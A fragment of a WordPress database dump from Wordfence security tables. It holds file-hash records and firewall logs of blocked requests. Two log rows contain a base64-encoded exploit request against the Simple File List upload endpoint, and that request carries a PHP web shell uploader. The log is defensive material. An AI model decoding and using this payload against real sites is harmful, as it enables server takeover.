','',0,'?'),('5Vx,$>7dk','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb9M','F/\'M%9}@fW>S*m','',0,'?'),('xz#]ru?0O','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hg`ɸ:ڕ^','F/QH\0^l 0BΓի6S@Ph','',0,'?'),('2:','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b4\'&','ۼ4P\'hNa>E5ఛ','',0,'?'),('iBj]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G8J+	z','>8\'XiUbGн,<T`64Ѝ','',0,'?'),('0Jfx#X{','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']mw/\\y5','ɐtd7H}=.tCw$`c\'','',0,'?'),('*1G鍫vLߟn','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k\'9L&۔Al+','<wWr2IMO+`@u','',0,'?'),('QS2#]srt','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 9-K9,','断8Z.8gKl2&.MO','',0,'?'),('*&C:[r9N','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pefi\'jW','6UmЖ%?MSA^=X|U','',0,'?'),('\'7b~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-с','9\0zotID:\0g I%~ަ$o','',0,'?'),('=Jǰja}LIZ','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pFt1+',';}\0[\'\rqĥd;#.','',0,'?'),('0ܚZI丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'U巃 qDFH','Ԧ!ӢtLk.\"1CmKg','',0,'?'),('ISU`uTF','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l{bOs_a>','mn5ߐ֞βgJ\\3','',0,'?'),('&DQRw]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-rjiIأeb','bE&q*','',0,'?'),('$[tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W	,~r','L>eh\rF$CV7','',0,'?'),('D=SC','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%X`йKZ','SW,fK{\\^Y/','',0,'?'),('zL5	g5Ď','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','trIbw\'-7','uS{<n\r߅+-#;᷃QЮ','',0,'?'),('yO\0yjeB\nVp','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eƀkvk\r','iiLMP4ިO_!iN	','',0,'?'),('U\\aE','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wͱr0؅=','?E%+w\r^֗.$i$[W','',0,'?'),('uRlt\"','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7֊i[L9ƁH	','߹{8(Ïat\0Cn3Qڤ\nl?$y','',0,'?'),('RjqIӏ\ZY&','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ădO[S\nc\0','^o&[l2Zg/?>P~CIȗ','',0,'?'),(']R>w.EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yϛvj\n','Sx^V>m!-qDeV','',0,'?'),('ᕵ7\\F|[El','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0s0C{[[t7','Zz`}JGN]lQ8H','',0,'?'),('5.=d)<peus^','wp-includes/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d/큱jfrh(','֍Wt*v)gDfݙ','',0,'?'),('ii\"oC`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@MMQmr','qX9Oa4A\'̾e','',0,'?'),('lt:{0+79C','wp-includes/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hx+07`}','@qzjI \0DaW6n{y','',0,'?'),('9ksB=}TŃc7','wp-includes/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VzȒ`(lE','⯠盍ԵJ\\_z[','',0,'?'),('.I\nfqM9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!iLV=X+	v0~','4-<4,\"VȱXʘîhR	KFk','',0,'?'),('Ѻɩuy}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b5lJ#v','c=0-#-TSX&4\0K8\r','',0,'?'),('sC<:<A','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Z{5o','<s6\0,	RauhXc','',0,'?'),('%..Ct=\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%VxE1N','!3|@0X1>\'[U','',0,'?'),('J-狁\\\"ץ&','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~XZe&OagAc','ADg9\'c$?ٵC/','',0,'?'),('\0GM(YlWz!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ:!ټ','3l@o-3SՏ&!','',0,'?'),('ǝQ_yd+','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XU iU0ll9c','_v$U7_*\r?+^≾Ā','',0,'?'),('ρXn\r?','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pƮuo7;~z',' %ly\'#[_{E]8%','',0,'?'),('ЬpIYR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zħ7	7V\Z','p#4opp8^۰^F+ף)l','',0,'?'),('g\ZŞ|q(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R<nI<','e}]TY(u&\r90+aDϮ#','',0,'?'),('e-\nyV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Wwb>EyJ','\'~6ȝ\nBagzdQ','',0,'?'),('v#qȃ','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EOxٕX2떭؃','xaJN!e\"\"Nq}AMC1){j','',0,'?'),('I	2RNjY','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\rs*\\','OZ=<3StQ_u;	m8','',0,'?'),('=}LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*E<sWRG','\n\\Xΰ֨PA\nXj\';q{a','',0,'?'),('S>sU)H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y$NXll','[-v5<M\n+Bu.,5g','',0,'?'),('PUac','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YAG=bu','z,ͥt	<{@Y{iysc(SL','',0,'?'),('ĵ>#Bb','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۓGc,=c^','Gct(5\n,9%)e','',0,'?'),('!h>iq8tn','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>@UeU','țp˄o<O\nOo{w=S','',0,'?'),('Q10G,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} pcKO','(H>0}8:e)ＴN/z','',0,'?'),('nۗvXH)','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yϛvj\n','Sx^V>m!-qDeV','',0,'?'),('\09k5&ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MkݢAD5zyj','BQe!RilsnqR41xxQ!','',0,'?'),('I/\ZN2p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Krz-YPSӠ','ߔT\Zq3O,wJ<j','',0,'?'),('\"0\0L\'M','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','95ef#ϝ','i\rC\"Գ\r48cS','',0,'?'),('*`Uz]\"L%1','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/Dzxǂ',',E{0/maXi','',0,'?'),('Z|075o','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3NM[/\r~H','rWQ@x[1 *o9$','',0,'?'),('(LS[Wl#','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%mS,\\','U!6/Ucqn@+','',0,'?'),('ue{X1','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D5$ý\n	\'q0','\\\"ԯ-\r6eNIDzB\r\0','',0,'?'),('V\ZF\0|','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@BgEJƽH','i|\\IE_X綈j','',0,'?'),('|~','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6):','H0Lї?㞹.1MIe٣','',0,'?'),('w+\02R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo\0y,*}c','2p\"Wjslf&S@[\\\"W','',0,'?'),('q05','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5O&?E	%','^%%hT,k2Ȯn=n%:','',0,'?'),('`}+6L-q[$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1`0','qƖ%/ygrwÛ\rLR>=Y','',0,'?'),('@}~4Gv<m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gbf>=','ߺ`\'盱Жx#i#','',0,'?'),('U6υsd~x','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r*unrdug','ҷ<hbo>W\ZN eia','',0,'?'),('hZ[=wr','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\:R/+','ɫ:jNmmR[','',0,'?'),('K=Xa:\'5','wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-p\0Ecbc','\"̘L!{rDnPz^XjLk','',0,'?'),('elsUO|R}ܝi','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}jǊQX]m','ɱ䱃Fn2c.nMڣ A','',0,'?'),('`~|D%EHwO','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yr.N(}','ol=+DCĸ)l)$tC','',0,'?'),('xOW\r','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1`-p1','\'V+?<!C\ZƾQUߢ','',0,'?'),('um-O\'ߝ]#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HDfaezR','㶜\\L>LN-@G\'tmGikR߮g\0','',0,'?'),('X=2h4/{+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h#9P$3Xsäf','0<lYw<5OȴfF-%:J','',0,'?'),('X=UpfpZ','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t.uXx\n','YG)vmPyl^F','',0,'?'),(':+[gCZ','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ģ`','(@\0Y!|Ht\"N,T$=̌p{','',0,'?'),(':=%M۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g.\Zq>z',';vѴQW){ \'~?%@%ywe','',0,'?'),('>hЩXX*v1','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZۼmSQK','=\0ѷx-0F2c9ujJϊ','',0,'?'),('\"8A\n=ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7[R+SA-\Za*e','}pN\0K6%),o`)1\08','',0,'?'),('fֈVԹ)9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\'牉TeD]pCA','Jϑ߷`š+,jr#eQ䫖 ','',0,'?'),('+q^eguF6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ţs^qcb','W5Tp;-n0aO\n','',0,'?'),('mL0N\"T~b','wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z.+j','iDAJψ;v,gc%	^#','',0,'?'),('Qֿ6yq88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yu|f$','\n*r-ω^ߣHDbߚ','',0,'?'),('&vAQcqw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8F','})d!q	,@,jv	E','',0,'?'),('LbP-I׭1f','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\#eua','ws<#7JG4X\\8=o۞!','',0,'?'),('0;-,AEy','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(S;I(','UkxrLb\"JAF(u;	\0&','',0,'?'),('XVטO|8}','wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T\n%i6#','\'pauEzf~DXmud','',0,'?'),('+qpW','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T:[K/6A','l1M[(LrEc>#\n','',0,'?'),('kB˞b=y','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aT\rWZE','f5s[VFr\n=\re&6E','',0,'?'),('g+yrqD/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','**O$2','zZ4\Z[A5EEFB','',0,'?'),('5ZSμv`69','wp-includes/version.php',0,'g6mcXN{|/','g6mcXN{|/','bdҬe-^m|5.Ԇro	','',0,'?'),('Y,Qpgmu#e~','wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gx4hX>9','/(&UyML_-`S\0KE','',0,'?'),('TYPpEw','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_vjC>a\'','ҀQ)W$@N|,CO','',0,'?'),('I0S$2TB*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OP\\Pt|-','M>f(Er_hXoۃ8@+O','',0,'?'),('RH\r0!d?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','28?\00S`y^MJ ','N&RXoLVzax sFPʔ1>','',0,'?'),('j\\Ħ<yp','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|MX\'پPy','×Xd_mn\"GM9\\)w#x@','',0,'?'),('&饱W؀|','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Ҷ.)]*^','V.ZAzNKS)lv׊Ϟ','',0,'?'),('Ὀ5f?hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OP/:#A','P!𴴨jzF#dĚMP','',0,'?'),('v\'j@-*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fSɉ]6n#\Z','>@ΡD&{(DγiO#','',0,'?'),('PJ~]; `y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7βps,I','CyGn$FpTC','',0,'?'),('_wƌ','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>yOG','10*uۤy[\\,/76\r','',0,'?'),(']NJjӎe','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U1$+z.u','Գ82\"ڍ5Ѣ*un7@\"i','',0,'?'),('n֢\rV5,','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Lʵ&X[','0w\nU%4X<(}{4|>I^l','',0,'?'),('Kc#2s/(\"','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Ч\"8uu(5','cv{{`n$@/?$n','',0,'?'),('6~e{\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Gq]n!','i^|}8̣ /\n','',0,'?'),('l/\nԀWͱ-c','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|d1i','Zφ^w3-Jo׮}\r','',0,'?'),('y7MA@','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_.hL)IhO G','Oq(-y\0<\0	k6w','',0,'?'),('F\rxw~\rܱ\n','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}#KDt','W{ߒtZM1THNp2,','',0,'?'),('-[ip\\^]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k<fhm','O.;BU\Z~=j13\"$RIi9','',0,'?'),('\0 k~U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}.Saa:e)','5%7jU}	fj]?j9','',0,'?'),('S&az8Jض9','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*T|AÊnȻ|','{Qݬ\0fPw|$9r','',0,'?'),('@sB0<{l3','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԑi^','ƤJľ**X|icy-u6pC-$*\n','',0,'?'),('Let\"pc(	e','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{!U7)Bt-','ZdFWɨ[_=T0c=','',0,'?'),('(^3N3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' -x<z^Wet','a;ɺ*2Zf1\"\nNt~>','',0,'?'),('^\'q0','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lnj\\wX=7I','7\"1jL?9Y\"&kŌVD|','',0,'?'),('$jX])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i4Fֿ',']o{ٷ	Wted','',0,'?'),('\r\0FJBe','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\\Z%WE8','=K̜&/wGgDkY<*;ĩ3','',0,'?'),('3T.^ƙ<','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^pC!Ԑ,','\0\nIPt}3RΘ/#A','',0,'?'),(';1ы#Y_Nt','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~O̠t N','y;ȓ[3ٙd.GkgE	FL5)\'d','',0,'?'),(',4#(#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','47VI','=\"+O{eE}\'iT8ܒE','',0,'?'),('o㮚-;?X:pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ewoRdF','\Z\0[O٭FA\"woĬ?o\\ܦ','',0,'?'),('4ڂL$,K[u','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j	܉QO9hc','G#+utpO<r`H=w','',0,'?');
/*!40000 ALTER TABLE `ar_wfFileMods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfHits`
--

DROP TABLE IF EXISTS `ar_wfHits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfHits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=MyISAM AUTO_INCREMENT=175098 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfHits`
--

LOCK TABLES `ar_wfHits` WRITE;
/*!40000 ALTER TABLE `ar_wfHits` DISABLE KEYS */;
INSERT INTO `ar_wfHits` VALUES (175070,1604366293.841981,1604366292.754800,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/old/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L29sZC93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvb2xkL3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODEuMC40MDQ0LjEyOSBTYWZhcmkvNTM3LjM2CkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9NWI4YWYwZjc0NzVhZDI2NzIyNDRjN2FiYTY4OGZmZDYKQ29udGVudC1MZW5ndGg6IDk5MgoKLS01YjhhZjBmNzQ3NWFkMjY3MjI0NGM3YWJhNjg4ZmZkNgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0lEIgoKMQotLTViOGFmMGY3NDc1YWQyNjcyMjQ0YzdhYmE2ODhmZmQ2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfVG9rZW4iCgpiYTI4ODI1MjYyOWE1Mzk5NzU5YjZmZGUxZTIwNWJjMgotLTViOGFmMGY3NDc1YWQyNjcyMjQ0YzdhYmE2ODhmZmQ2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfRmlsZVVwbG9hZERpciIKCi93cC1jb250ZW50L3VwbG9hZHMvc2ltcGxlLWZpbGUtbGlzdC8KLS01YjhhZjBmNzQ3NWFkMjY3MjI0NGM3YWJhNjg4ZmZkNgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1RpbWVzdGFtcCIKCjE1ODcyNTg4ODUKLS01YjhhZjBmNzQ3NWFkMjY3MjI0NGM3YWJhNjg4ZmZkNgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0id3pjcnNva29ieS5wbmciCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nCkV4cGlyZXM6IDAKCjw\\/cGhwIGVjaG8gIk1vaGFtZWRYTy1TcDNjdHJhIjsgZWNobyAiPGJyPiIucGhwX3VuYW1lKCkuIjxicj4iOyBlY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPiA8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0nemInPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3VwbG9hZCcgdmFsdWU9J3VwbG9hZCc+PC9mb3JtPiI7IGlmKCRfUE9TVFsndXBsb2FkJ10pIHsgaWYoQGNvcHkoJF9GSUxFU1snemInXVsndG1wX25hbWUnXSwgJF9GSUxFU1snemInXVsnbmFtZSddKSkgeyBlY2hvICJlWHBsb2l0aW5nIERvbmUiOyB9IGVsc2UgeyBlY2hvICJGYWlsZWQgdG8gVXBsb2FkLiI7IH0gfSA\\/PgotLTViOGFmMGY3NDc1YWQyNjcyMjQ0YzdhYmE2ODhmZmQ2LS0K\"}'),(175069,1604366296.291539,1604366294.949900,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/demo/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload 